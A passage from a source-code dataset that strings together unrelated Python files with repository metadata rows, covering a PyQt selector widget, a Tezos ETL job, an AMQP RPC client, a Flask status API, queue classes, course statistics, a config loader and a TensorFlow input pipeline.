data.to_xyz()
item = QStandardItem("Cartesian coordinates")
font = item.font()
font.setBold(True)
item.setFont(font)
item.setEnabled(False)
model.insertRow(self.c_component.count(), item)
self.c_component.addItem("x-axis component")
self.c_component.addItem("y-axis component")
if "axial" in comp_stored:
self.c_component.addItem("z-axis component")
except:
pass
elif "comp_x" in comp_stored or "comp_y" in comp_stored:
item = QStandardItem("Cartesian coordinates")
font = item.font()
font.setBold(True)
item.setFont(font)
item.setEnabled(False)
model.insertRow(0, item)
try:
data.to_rphiz()
item = QStandardItem("Polar coordinates")
font = item.font()
font.setBold(True)
item.setFont(font)
item.setEnabled(False)
model.insertRow(self.c_component.count(), item)
self.c_component.addItem("radial")
self.c_component.addItem("circumferential")
if "comp_z" in comp_stored:
self.c_component.addItem("axial")
except:
pass
# Recovering all the components available after the update
self.component_list = [
self.c_component.itemText(i)
for i in range(self.c_component.count())
if self.c_component.itemText(i)
not in ["Polar coordinates", "Cartesian coordinates"]
]
# Modifying the width of the dropdown list to make sure that all the element are readable
component_list = [
self.c_component.itemText(i) for i in range(self.c_component.count())
]
width_drop_down = max([len(ac) for ac in component_list]) * 6
self.c_component.view().setMinimumWidth(width_drop_down)
self.c_component.setCurrentIndex(1)
self.blockSignals(False)
def update_needed(self):
"""Emit a signal when the component must be changed
Parameters
----------
self : WExport
a WVectorSelector object
"""
# if self.c_component.currentText() in [
# "Polar coordinates",
# "Cartesian coordinates",
# ]:
# self.c_component.setCurrentIndex(self.c_component.currentIndex() + 1)
self.refreshComponent.emit()
| 32.68306 | 97 | 0.582177 | 5,375 | 0.898679 | 0 | 0 | 0 | 0 | 0 | 0 | 2,227 | 0.372346 |
44306ec0cf33d83c853874a333ccf8829c102184 | 2,914 | py | Python | tezosetl/jobs/export_job.py | blockchain-etl/tezos-etl | ddc5ddb129f1289afd5c56c54ba4607d274b61de | [
"MIT"
] | 7 | 2020-06-07T11:28:00.000Z | 2022-01-17T19:07:06.000Z | tezosetl/jobs/export_job.py | blockchain-etl/tezos-etl | ddc5ddb129f1289afd5c56c54ba4607d274b61de | [
"MIT"
] | 1 | 2021-05-13T01:26:22.000Z | 2021-05-23T12:26:42.000Z | tezosetl/jobs/export_job.py | blockchain-etl/tezos-etl | ddc5ddb129f1289afd5c56c54ba4607d274b61de | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2020 Evgeny Medvedev, evge.medvedev@gmail.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from tezosetl.mappers.balance_update_mapper import map_balance_updates
from tezosetl.mappers.block_mapper import map_block
from tezosetl.mappers.operation_mapper import map_operations
from tezosetl.service.tezos_service import TezosService
from blockchainetl_common.executors.batch_work_executor import BatchWorkExecutor
from blockchainetl_common.jobs.base_job import BaseJob
from blockchainetl_common.utils import validate_range
# Exports blocks, balance updates and operations
class ExportJob(BaseJob):
def __init__(
self,
start_block,
end_block,
tezos_rpc,
max_workers,
item_exporter,
batch_size=1):
validate_range(start_block, end_block)
self.start_block = start_block
self.end_block = end_block
self.batch_work_executor = BatchWorkExecutor(batch_size, max_workers)
self.item_exporter = item_exporter
self.tezos_service = TezosService(tezos_rpc)
def _start(self):
self.item_exporter.open()
def _export(self):
self.batch_work_executor.execute(
range(self.start_block, self.end_block + 1),
self._export_batch,
total_items=self.end_block - self.start_block + 1
)
def _export_batch(self, block_number_batch):
responses = self.tezos_service.get_blocks(block_number_batch)
for response in responses:
block = map_block(response)
self.item_exporter.export_item(block)
self.item_exporter.export_items(map_balance_updates(block, response))
self.item_exporter.export_items(map_operations(block, response))
def _end(self):
self.batch_work_executor.shutdown()
self.item_exporter.close()
| 40.472222 | 81 | 0.735415 | 1,296 | 0.444749 | 0 | 0 | 0 | 0 | 0 | 0 | 1,162 | 0.398765 |
4431cc070b5b72f9b1711e84d06659e38998a2d7 | 3,066 | py | Python | examples/amq/rpc/rpc-client.py | JohnSitarski/gestalt | 119bc0f1c1c8a9ad1919347573d25f1c502737dc | [
"MIT"
] | 8 | 2019-07-25T08:33:18.000Z | 2021-05-09T23:25:55.000Z | examples/amq/rpc/rpc-client.py | JohnSitarski/gestalt | 119bc0f1c1c8a9ad1919347573d25f1c502737dc | [
"MIT"
] | 1 | 2020-01-07T23:08:16.000Z | 2020-01-08T03:20:53.000Z | examples/amq/rpc/rpc-client.py | JohnSitarski/gestalt | 119bc0f1c1c8a9ad1919347573d25f1c502737dc | [
"MIT"
] | 3 | 2019-09-17T12:00:11.000Z | 2021-05-09T23:26:06.000Z | import argparse
import asyncio
import logging
import random
from aio_pika.exceptions import DeliveryError
from gestalt.amq.requester import Requester
from gestalt.serialization import CONTENT_TYPE_JSON
from gestalt.runner import run
logger = logging.getLogger(__name__)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="AMQP RPC Client Example")
parser.add_argument(
"--amqp-url", metavar="<url>", type=str, default=None, help="The AMQP URL"
)
parser.add_argument(
"--exchange-name",
metavar="<name>",
type=str,
default="",
help="The AMQP exchange name. Defaults to a empty string which is the default exchange.",
)
parser.add_argument(
"--service-name",
metavar="<pattern>",
type=str,
default="clock-service",
help="The service name. Defaults to 'clock-service'.",
)
parser.add_argument(
"--log-level",
type=str,
choices=["debug", "info", "error"],
default="error",
help="Logging level. Default is 'error'.",
)
args = parser.parse_args()
logging.basicConfig(
format="%(asctime)s.%(msecs)03.0f [%(levelname)s] [%(name)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=getattr(logging, args.log_level.upper()),
)
requester = Requester(
amqp_url=args.amqp_url,
exchange_name=args.exchange_name,
service_name=args.service_name,
serialization=CONTENT_TYPE_JSON,
)
async def message_requester(r: Requester) -> None:
""" Generate a new request message, in various formats, and publish it """
counter = 0
while True:
counter += 1
request_msg = dict(sequence_number=counter, utc=True)
# For demonstration purposes randomly choose to use an invalid
# service name to show that the message gets returned and raises
# a DeliveryError exception.
service_name = (
r.service_name if random.random() < 0.8 else "invalid_service_name"
)
try:
logger.info(f"Sending request {request_msg} to {service_name}")
response_msg = await r.request(
request_msg, expiration=2, service_name=service_name
)
logger.info(f"Received response: {response_msg}")
except asyncio.TimeoutError as exc:
logger.info(f"Request was timed-out: {exc}")
except asyncio.CancelledError as exc:
logger.info(f"Request was cancelled: {exc}")
except DeliveryError as exc:
logger.info(f"Request delivery error: {exc}")
# Wait some time before sending another request
await asyncio.sleep(3)
async def start_requesting(r):
await r.start()
await asyncio.sleep(1)
asyncio.get_event_loop().create_task(message_requester(r))
run(start_requesting(requester), finalize=requester.stop)
| 33.326087 | 97 | 0.613177 | 0 | 0 | 0 | 0 | 0 | 0 | 1,459 | 0.475864 | 906 | 0.295499 |
4437b9810c4e7fa906b091e98a1904da452af26d | 915 | py | Python | api/v1/views/index.py | bdbaraban/HolbertonBnB | 70812bcef485e4d57ca0f7a1d0ddc59583f4122a | [
"MIT"
] | 1 | 2022-02-08T03:51:31.000Z | 2022-02-08T03:51:31.000Z | api/v1/views/index.py | bdbaraban/HolbertonBnB | 70812bcef485e4d57ca0f7a1d0ddc59583f4122a | [
"MIT"
] | null | null | null | api/v1/views/index.py | bdbaraban/HolbertonBnB | 70812bcef485e4d57ca0f7a1d0ddc59583f4122a | [
"MIT"
] | 8 | 2020-12-10T14:41:39.000Z | 2022-03-10T21:35:59.000Z | #!/usr/bin/env python3
"""Defines a status route for the HolbertonBnB API."""
from flask import jsonify
from flasgger import swag_from
from models import storage
from api.v1.views import app_views
@app_views.route("/status")
@swag_from("../apidocs/status/status.yml")
def status():
"""Returns the server status.
Returns:
JSON object with the current server status.
"""
return jsonify({"status": "OK"})
@app_views.route("/stats")
@swag_from("../apidocs/stats/stats.yml")
def stats():
"""Retrives the count of each object type.
Returns:
JSON object with the number of objects by type."""
return jsonify({
"amenities": storage.count("Amenity"),
"cities": storage.count("City"),
"places": storage.count("Place"),
"reviews": storage.count("Review"),
"states": storage.count("State"),
"users": storage.count("User")
})
| 26.142857 | 58 | 0.645902 | 0 | 0 | 0 | 0 | 712 | 0.778142 | 0 | 0 | 475 | 0.519126 |
4437e9f6903630a640348af85239c86e44387d67 | 2,499 | py | Python | helper.py | NorthwoodsDev/CircuitPython_Companion_Bot | de9283d0af8f59d1ffc2fd43f39d90baee041859 | [
"MIT"
] | null | null | null | helper.py | NorthwoodsDev/CircuitPython_Companion_Bot | de9283d0af8f59d1ffc2fd43f39d90baee041859 | [
"MIT"
] | null | null | null | helper.py | NorthwoodsDev/CircuitPython_Companion_Bot | de9283d0af8f59d1ffc2fd43f39d90baee041859 | [
"MIT"
] | null | null | null | import os
import storage
import time
import board
import random
import microcontroller
def get_rndRGB():
a = (random.randint(20, 235))
b = (random.randint(20, 235))
c = (random.randint(20, 235))
return (a,b,c)
def timelasp(monoClk_last, monoClk_Interact, user_AFK):
try:
monoClk = time.monotonic()
monoClk_eclip = monoClk - monoClk_last
if monoClk_eclip > 60:
monoClk_last = monoClk
monoClk_Interact += 1
if monoClk_Interact > 5:
user_AFK = True
else:
user_AFK = False
except Exception as e:
print("Error Timer:" + str(e))
return monoClk_last, monoClk_Interact, user_AFK
def doframe(lastFrame, frame):
try:
frame = False
monoClk = time.monotonic()
frameEclip = monoClk - lastFrame
if frameEclip > 0.3:
lastFrame = monoClk
frame = True
except Exception as e:
print("Error Frame:" + str(e))
return lastFrame, frame
def save(companbot_x_stat):
try:
print ("Saving")
storage.remount("/", False)
eventLog = open("save.csv", "w+")
eventLog.write(str(companbot_x_stat.xp) + "," + str(companbot_x_stat.lvl)+ "," + str(companbot_x_stat.hp) + "," + str(companbot_x_stat.pAtk) + "," + str(companbot_x_stat.pDef) + "," + str(companbot_x_stat.cred) + '\n')
eventLog.close()
storage.remount("/", True)
except Exception as e:
print ("Error writing log: " + str(e))
storage.remount("/", True)
return
def load(companbot_x):
try:
eventLog = open("save.csv", "r")
sf = eventLog.read()
sfa = sf.split(',')
companbot_x.xp = sfa[0].strip()
companbot_x.lvl = sfa[1].strip()
companbot_x.hp = sfa[2].strip()
companbot_x.pAtk = sfa[3].strip()
companbot_x.pDef = sfa[4].strip()
companbot_x.cred = sfa[5].strip()
except Exception as e:
print ("Error loading save: " + str(e))
return companbot_x
def chat():
sayWhat = ["Hello.",
"Ahcooo!",
"Stay cool.",
"Just keep walking.",
"Groovy.",
"I'm having Fun!",
"Have you seen my friends?",
"Let's Adventure!",
"Wonder what to do next?",
"Chilldogs.",
"Do you like to dance?",
"When do we eat?",
"Let's play Blackjack!",
"Watch out for monsters.",
"Hmm...Hm.Hmm. Oh!",
"What you doing?"]
say = sayWhat[random.randint(0, 15)]
return say | 27.766667 | 226 | 0.577831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 418 | 0.167267 |
4437f26ba6c39393772f578c50974f0c3bd7647f | 3,538 | py | Python | data_strctures/queue.py | CodenameREBIRTH/algopy | f3894c98b7232d0f6067eb52ca68f9e6a8875884 | [
"MIT"
] | 4 | 2019-09-28T17:02:47.000Z | 2020-01-15T15:51:40.000Z | data_strctures/queue.py | CodenameREBIRTH/algopy | f3894c98b7232d0f6067eb52ca68f9e6a8875884 | [
"MIT"
] | 1 | 2019-10-15T03:56:59.000Z | 2019-10-15T03:56:59.000Z | data_strctures/queue.py | CodenameREBIRTH/algopy | f3894c98b7232d0f6067eb52ca68f9e6a8875884 | [
"MIT"
] | 3 | 2019-10-14T16:22:08.000Z | 2020-10-07T08:32:08.000Z | import inspect
class Queue(object):
'''
Queue data structure FIFO - First In First Out
'''
def __init__(self, capacity = 10):
'''
:param size: max capacity of the queue, default is 10
'''
self.queue = []
self.front = None
self.rear = None
self.size = 0
self.capacity = capacity
def __str__(self):
'''
:return:
'''
return ' '.join([str(i) for i in self.queue])
def get_size(self):
'''
:return: current size of the queue
'''
return self.size
def is_empty(self):
'''
:return: true if queue is empty, false otherwise
'''
return self.size == 0
def enequeue(self, value):
'''
:param value: value to be enqueued
:return: -1 if queue is full
'''
if self.size >= self.capacity:
return -1
else:
self.queue.append(value)
if self.front is None:
self.front = self.rear = 0
else:
self.rear = self.size
self.size += 1
def dequeue(self):
'''
:return: the element removed from the queue, None if queue is empty
'''
if self.is_empty():
return None
else:
self.size -= 1
if self.size == 0:
self.front = self.rear = 0
else:
self.rear = self.size - 1
return self.queue.pop(0)
@staticmethod
def get_code():
'''
:return: return source code for current class
'''
return inspect.getsource(Queue)
class Deque(object):
'''
Deque -> doubly ended queue
'''
def __init__(self, capacity = 10):
'''
:param capacity: max capacity of the deque
'''
self.queue = []
self.capacity = capacity
def __str__(self):
return ' '.join([str(i) for i in self.queue])
def is_full(self):
'''
to check whether deque is full or not
:return: true if deque is full, false otherwise
'''
return len(self.queue) == self.capacity
def is_empty(self):
'''
to check whether deque is empty or not
:return: true if deque is empty, false otherwise
'''
return len(self.queue) == 0
def insert_right(self, info):
'''
:param info: data to be added
:return: None if deque is full
'''
if self.is_full():
return None
else:
self.queue.append(info)
def insert_left(self, info):
'''
:param info: data to be added
:return: None if deque is full
'''
if self.is_full():
return None
else:
self.queue.insert(0, info)
def remove_left(self):
'''
:return: element which is removed, None if deque is empty
'''
if not self.is_empty():
return self.queue.pop(0)
else:
return None
def remove_right(self):
'''
:return: remove element from right end
'''
if self.is_empty():
return None
else:
self.queue.pop()
@staticmethod
def get_code():
'''
:return: source code for the current class
'''
return inspect.getsource(Deque)
# TODO -> add priority queue and circuler queue for concept purpose
| 18.331606 | 75 | 0.498021 | 3,433 | 0.970322 | 0 | 0 | 302 | 0.085359 | 0 | 0 | 1,379 | 0.389768 |
4438dec493c05b8f2b45e2e4cf553dc716b064b6 | 4,549 | py | Python | course_science.py | 9999years/brandeis-classes | e43d0227bafb4562d533565f3e94cd799ce636b8 | [
"MIT"
] | null | null | null | course_science.py | 9999years/brandeis-classes | e43d0227bafb4562d533565f3e94cd799ce636b8 | [
"MIT"
] | null | null | null | course_science.py | 9999years/brandeis-classes | e43d0227bafb4562d533565f3e94cd799ce636b8 | [
"MIT"
] | null | null | null | import itertools
import os.path
from collections import Counter
from glob import glob
from typing import List, Mapping
import brandeis
COURSES = {}
def all_courses() -> Mapping[str, List[brandeis.Course]]:
global COURSES
if COURSES:
return COURSES
else:
COURSES = read_all()
return COURSES
def read(fname: str) -> List[brandeis.Course]:
"""for initializing COURSES"""
with open(fname, "r") as f:
return brandeis.load_courses(f)
def read_all(outdir: str = "out") -> List[brandeis.Course]:
"""for initializing COURSES"""
pat = os.path.join(outdir, "*-*.json")
ret = {}
# theyre numbered so this works
for fname in sorted(glob(pat)):
base, *_ = os.path.basename(fname).split(os.path.extsep)
year, semester = base.split("-")
if semester == "1":
# january
# semester = '01'
pass
elif semester == "2":
# skip summer
continue
elif semester == "3":
# september
# semester = '09'
pass
else:
raise ValueError("Invalid semester number " + semester)
ret[f"{year}-{semester}"] = read(fname)
return ret
def display_semester(sem) -> str:
yr, sem = sem.split("-")
sem = {"1": "Spring", "3": "Fall",}[sem]
return f"{yr} {sem}"
def total_courses_per_subject():
ret = {}
for courses in all_courses().values():
for course in courses:
if course.subject not in ret:
ret[course.subject] = 0
ret[course.subject] += 1
return ret
def courses_per_subject():
ret = {}
for sem, courses in all_courses().items():
ret[sem] = Counter(map(lambda c: c.subject, courses))
return ret
def courses_per_semester(subj=None) -> List[int]:
ret = {}
for sem, courses in all_courses().items():
if subj is not None:
courses = list(filter(lambda c: c.subject == subj, courses))
ret[sem] = len(courses)
return ret
def students_per_semester(subj=None) -> List[int]:
ret = {}
for sem, courses in all_courses().items():
if subj is not None:
courses = list(filter(lambda c: c.subject == subj, courses))
ret[sem] = sum(map(lambda c: c.enrolled, courses))
return ret
def students_per_class():
total_courses = []
for sem, courses in all_courses().items():
total_courses.extend(courses)
ret = {}
for subj in brandeis.constants.SUBJECTS:
subj_courses = list(
filter(
lambda e: e > 0,
map(
lambda c: c.enrolled,
filter(lambda c: c.subject == subj, total_courses),
),
)
)
if subj_courses:
ret[subj] = sum(subj_courses) / len(subj_courses)
return ret
def students_per_class_total():
total_courses = []
for sem, courses in all_courses().items():
total_courses.extend(courses)
courses = list(filter(lambda e: e > 0, map(lambda c: c.enrolled, total_courses)))
return sum(courses) / len(courses)
def student_enrollments():
ret = {}
for sem, courses in all_courses().items():
ret[sem] = {}
for subj in brandeis.constants.SUBJECTS:
ret[sem][subj] = sum(
map(lambda c: c.enrolled, filter(lambda c: c.subject == subj, courses))
)
return ret
def sorted_dict(d):
return [(k, d[k]) for k in sorted(d, key=d.get, reverse=True)]
def printdict(d):
i = 0
print("[")
for sem, dat in d.items():
i += 1
sem = format(repr(display_semester(sem)), "13")
print("[", sem, ",", dat, "],")
print("]")
def main():
# corr = courses_per_semester()
# for sem, dat in courses_per_semester('COSI').items():
# corr[sem] = dat / corr[sem]
# print(*map(lambda x: f'{x[0]} | {x[1]}],', students_per_class().items()), sep='\n')
printdict(student_enrollments())
# print(*sorted_dict(students_per_class()['2018-3']), sep='\n')
# print(sorted(set(map(lambda c: c.subject, itertools.chain(*all_courses().values())))))
# subjects = total_courses_per_subject()
# subjects = [(k, subjects[k]) for k in sorted(subjects, key=subjects.get, reverse=True)]
# print(*[s[0] for s in subjects if s[1] > 500], sep='\n')
# for sem, courses in courses_per_subject().items():
# print(sem, ':', courses.most_common(5))
if __name__ == "__main__":
main()
| 27.403614 | 93 | 0.573533 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 931 | 0.20466 |
44399f62445aff54bdaa825b5afca3b8782554ba | 1,803 | py | Python | merak/utils/refs.py | Yao1993/merak | 517b7a8eca82eebbf22bcd3688a79e1e76ed9d42 | [
"Apache-2.0"
] | 16 | 2021-01-22T04:09:30.000Z | 2022-03-17T10:38:34.000Z | merak/utils/refs.py | Yao1993/merak | 517b7a8eca82eebbf22bcd3688a79e1e76ed9d42 | [
"Apache-2.0"
] | 6 | 2021-04-12T10:09:47.000Z | 2022-03-24T09:31:13.000Z | merak/utils/refs.py | Yao1993/merak | 517b7a8eca82eebbf22bcd3688a79e1e76ed9d42 | [
"Apache-2.0"
] | 2 | 2021-07-14T05:39:17.000Z | 2021-07-28T16:27:40.000Z | # Copyright 2021 (David) Siu-Kei Muk. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
def _get_lib_root():
root = os.path.join(os.path.dirname(__file__), "..")
return os.path.abspath(root)
class _PrefixPathDict(dict):
def __init__(self, prefix):
super(_PrefixPathDict, self).__init__()
self._prefix = prefix
def __setitem__(self, key, value):
if isinstance(value, str):
value = os.path.join(self._prefix, value)
super(_PrefixPathDict, self).__setitem__(key, value)
def _PackageDataMeta(prefix):
class _Meta(type):
@classmethod
def __prepare__(metacls, name, bases):
origin = super(_Meta, _Meta).__prepare__(metacls=metacls,
__name=name,
__bases=bases)
pfx_path_dict = _PrefixPathDict(
os.path.join(_get_lib_root(), prefix))
if origin: pfx_path_dict.update(origin)
return pfx_path_dict
return _Meta
class Template(metaclass=_PackageDataMeta("data")):
PY_INIT = "__init__.tmpl"
PY_SETUP = "setup.tmpl"
| 32.781818 | 80 | 0.665003 | 832 | 0.461453 | 0 | 0 | 402 | 0.222962 | 0 | 0 | 709 | 0.393233 |
443a6baa9c0756dd7aae2e5c5109341c173ecdeb | 538 | py | Python | Python/kth-largest-element-in-a-stream.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | 1 | 2020-10-27T03:22:31.000Z | 2020-10-27T03:22:31.000Z | Python/kth-largest-element-in-a-stream.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | null | null | null | Python/kth-largest-element-in-a-stream.py | se77enn/LeetCode-Solution | d29ef5358cae592b63952c3d293897a176fb75e1 | [
"MIT"
] | 1 | 2021-03-22T18:58:23.000Z | 2021-03-22T18:58:23.000Z | # Time: O(nlogk)
# Space: O(k)
import heapq
class KthLargest(object):
def __init__(self, k, nums):
"""
:type k: int
:type nums: List[int]
"""
self.__k = k
self.__min_heap = []
for n in nums:
self.add(n)
def add(self, val):
"""
:type val: int
:rtype: int
"""
heapq.heappush(self.__min_heap, val)
if len(self.__min_heap) > self.__k:
heapq.heappop(self.__min_heap)
return self.__min_heap[0]
| 19.214286 | 44 | 0.494424 | 489 | 0.908922 | 0 | 0 | 0 | 0 | 0 | 0 | 154 | 0.286245 |
443e6327aedef6ac6c12e9616d7d14e817f67223 | 3,344 | py | Python | youtube_series_downloader/gateways/config_gateway.py | Senth/youtube-series-downloader | fadacc16798de336e4f5a2cf7648219bffb67016 | [
"MIT"
] | 3 | 2021-02-13T12:46:11.000Z | 2022-03-20T21:43:37.000Z | youtube_series_downloader/gateways/config_gateway.py | Senth/youtube-series-downloader | fadacc16798de336e4f5a2cf7648219bffb67016 | [
"MIT"
] | 14 | 2021-04-19T09:52:23.000Z | 2021-11-24T20:01:50.000Z | youtube_series_downloader/gateways/config_gateway.py | Senth/youtube-series-downloader | fadacc16798de336e4f5a2cf7648219bffb67016 | [
"MIT"
] | null | null | null | import os
import platform
from configparser import ExtendedInterpolation
from pathlib import Path
from subprocess import run
from sys import exit
from typing import List
from blulib.config_parser import ConfigParser
from tealprint import TealPrint
from tealprint.teallevel import TealLevel
from youtube_series_downloader.config import General, config
from youtube_series_downloader.core.channel import Channel
class ConfigGateway:
def __init__(self) -> None:
self.path = Path.home().joinpath(f".{config.app_name}.cfg")
self.parser = ConfigParser(interpolation=ExtendedInterpolation())
def check_config_exists(self) -> None:
if not self.path.exists():
TealPrint.info(f"Could not find any configuration file in {self.path}")
user_input = input("Do you want to copy the example config and edit it (y/n)?")
if user_input.lower() == "y":
self.parser.copy_example_if_conf_not_exists(config.app_name)
editor = ""
if "EDITOR" in os.environ:
editor = os.environ["EDITOR"]
if editor == "" and platform.system() == "Windows":
editor = "notepad.exe"
elif editor == "":
editor = "vim"
run([editor, self.path])
else:
exit(0)
def read(self):
self.parser.read(self.path)
def get_general(self) -> General:
general = General()
self.parser.to_object(
general,
"General",
"series_dir",
"int:threads",
"float:speed_up_default",
"int:max_days_back",
"log_level",
)
if not general.series_dir:
TealPrint.warning(f"Missing 'series_dir' in [General] in your configuration. Please add it.", exit=True)
# Convert string to LogLevel
if isinstance(general.log_level, str):
try:
general.log_level = TealLevel[general.log_level]
except KeyError:
TealPrint.warning(
f"Failed to set log_level from config, invalid level: {general.log_level}. Setting log_level to info"
)
general.log_level = TealLevel.info
return general
def get_channels(self) -> List[Channel]:
channels: List[Channel] = []
for section in self.parser.sections():
if ConfigGateway.is_channel_section(section):
channel = Channel()
channel.name = section
self.parser.to_object(
channel,
section,
"id",
"name",
"dir->collection_dir",
"float:speed",
"str_list:includes",
"str_list:excludes",
)
if not channel.id:
TealPrint.warning(
f"Missing 'id' for channel [{section}] in your configuration. Please add it.", exit=True
)
channels.append(channel)
return channels
@staticmethod
def is_channel_section(section: str) -> bool:
return section != "General" and section != "DEFAULT" and section != "vars"
| 34.833333 | 121 | 0.559211 | 2,930 | 0.876196 | 0 | 0 | 146 | 0.04366 | 0 | 0 | 665 | 0.198864 |
443e759d16cba07de3629249873b2670919d009a | 5,590 | py | Python | activeClassifier/env/input_fn.py | dHonerkamp/ActiveClassifier | 052675277153594db64261cd56699a057e633de2 | [
"Apache-2.0"
] | null | null | null | activeClassifier/env/input_fn.py | dHonerkamp/ActiveClassifier | 052675277153594db64261cd56699a057e633de2 | [
"Apache-2.0"
] | null | null | null | activeClassifier/env/input_fn.py | dHonerkamp/ActiveClassifier | 052675277153594db64261cd56699a057e633de2 | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
def parse_function(filename, label, FLAGS):
image_string = tf.read_file(filename)
# Don't use tf.image.decode_image, or the output shape will be undefined
image = tf.image.decode_png(image_string, channels=FLAGS.img_shape[-1])
# This will convert to float values in [0, 1]
image = tf.image.convert_image_dtype(image, tf.float32)
image.set_shape(FLAGS.img_shape)
if FLAGS.dataset == "omniglot":
# change lines to 1 and empty space to 0 as in mnist to be potentially able to cross-train
image = tf.abs(image - 1)
return image, label
def translate_function(image, label, FLAGS):
'''
Not sure if translation differs every epoch or not atm.
Alternative: could pass a vector with pre-sampled x1, y1 (and a counter to index) along to ensure same translation.
'''
if FLAGS.translated_size:
pad_height = FLAGS.translated_size - FLAGS.img_shape[0]
pad_width = FLAGS.translated_size - FLAGS.img_shape[1]
image = tf.reshape(image, FLAGS.img_shape)
y1 = tf.random_uniform(shape=[], maxval=pad_height, dtype=tf.int32)
x1 = tf.random_uniform(shape=[], maxval=pad_width, dtype=tf.int32)
image = tf.pad(image, [(y1, pad_height - y1), (x1, pad_width - x1), (0,0)], mode='constant', constant_values=0.)
return image, label
def resize_function(image, label, FLAGS):
image = tf.image.resize_images(image, 2 * [FLAGS.img_resize], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
return image, label
def pipeline(data, batch_sz, FLAGS, shuffle, repeats, n, preftch=4):
translate_fn = lambda img, label: translate_function(img, label, FLAGS)
parse_fn = lambda img, label: parse_function(img, label, FLAGS)
resize_fn = lambda img, label: resize_function(img, label, FLAGS)
out_data = (tf.data.Dataset.from_tensor_slices(data)
.shuffle(buffer_size=tf.cast(n, tf.int64), reshuffle_each_iteration=shuffle)
)
if FLAGS.dataset in ["MNIST_cluttered", "omniglot"]:
out_data = out_data.map(parse_fn, num_parallel_calls=FLAGS.num_parallel_preprocess)
if FLAGS.img_resize:
out_data = out_data.map(resize_fn, num_parallel_calls=FLAGS.num_parallel_preprocess)
if FLAGS.translated_size:
out_data = out_data.map(translate_fn, num_parallel_calls=FLAGS.num_parallel_preprocess)
if FLAGS.cache:
out_data = out_data.cache()
out_data = (out_data
# .apply(batch_and_drop_remainder(FLAGS.batch_size)) # tSNE requires known batch_sz
.batch(batch_sz)
.repeat(repeats)
.prefetch(preftch)
)
return out_data
def input_fn(FLAGS, batch_sz):
'''train, valid, test: tuples of (images, labels)'''
def mask_batch_sz(shape):
return [None] + list(shape[1:])
features_ph_train = tf.placeholder(FLAGS.data_dtype[0], mask_batch_sz(FLAGS.train_data_shape[0]))
labels_ph_train = tf.placeholder(FLAGS.data_dtype[1], mask_batch_sz(FLAGS.train_data_shape[1]))
features_ph_valid = tf.placeholder(FLAGS.data_dtype[0], mask_batch_sz(FLAGS.valid_data_shape[0]))
labels_ph_valid = tf.placeholder(FLAGS.data_dtype[1], mask_batch_sz(FLAGS.valid_data_shape[1]))
features_ph_test = tf.placeholder(FLAGS.data_dtype[0], mask_batch_sz(FLAGS.test_data_shape[0]))
labels_ph_test = tf.placeholder(FLAGS.data_dtype[1], mask_batch_sz(FLAGS.test_data_shape[1]))
tr_data = pipeline((features_ph_train, labels_ph_train), batch_sz, FLAGS, repeats=tf.cast(tf.ceil(FLAGS.num_epochs + FLAGS.num_epochs / FLAGS.eval_step_interval), tf.int64), shuffle=True, n=FLAGS.train_data_shape[0][0])
# repeats * 2 because also used for visualization etc.
valid_data = pipeline((features_ph_valid, labels_ph_valid), batch_sz, FLAGS, repeats=tf.cast(tf.ceil(20 * FLAGS.num_epochs / FLAGS.eval_step_interval), tf.int64), shuffle=False, n=FLAGS.valid_data_shape[0][0])
test_data = pipeline((features_ph_test, labels_ph_test), batch_sz, FLAGS, repeats=tf.cast(tf.ceil(20 * FLAGS.num_epochs / FLAGS.eval_step_interval), tf.int64), shuffle=False, n=FLAGS.test_data_shape[0][0])
if FLAGS.img_resize:
FLAGS.img_shape[0:2] = 2 * [FLAGS.img_resize]
if FLAGS.translated_size:
FLAGS.img_shape[0:2] = 2 * [FLAGS.translated_size]
handle = tf.placeholder(tf.string, shape=[], name='handle')
iterator = tf.data.Iterator.from_string_handle(handle, tr_data.output_types, tr_data.output_shapes)
# iterator = tf.data.Iterator.from_structure(tr_data.output_types, tr_data.output_shapes)
images, labels = iterator.get_next()
train_init_op = tr_data.make_initializable_iterator()
valid_init_op = valid_data.make_initializable_iterator()
test_init_op = test_data.make_initializable_iterator()
# train_init_op = iterator.make_initializer(tr_data)
# valid_init_op = iterator.make_initializer(valid_data)
# test_init_op = iterator.make_initializer(test_data)
inputs = {'images': images,
'labels': labels,
'features_ph_train': features_ph_train,
'labels_ph_train' : labels_ph_train,
'features_ph_valid': features_ph_valid,
'labels_ph_valid' : labels_ph_valid,
'features_ph_test' : features_ph_test,
'labels_ph_test' : labels_ph_test,
'handle': handle,
'train_init_op': train_init_op,
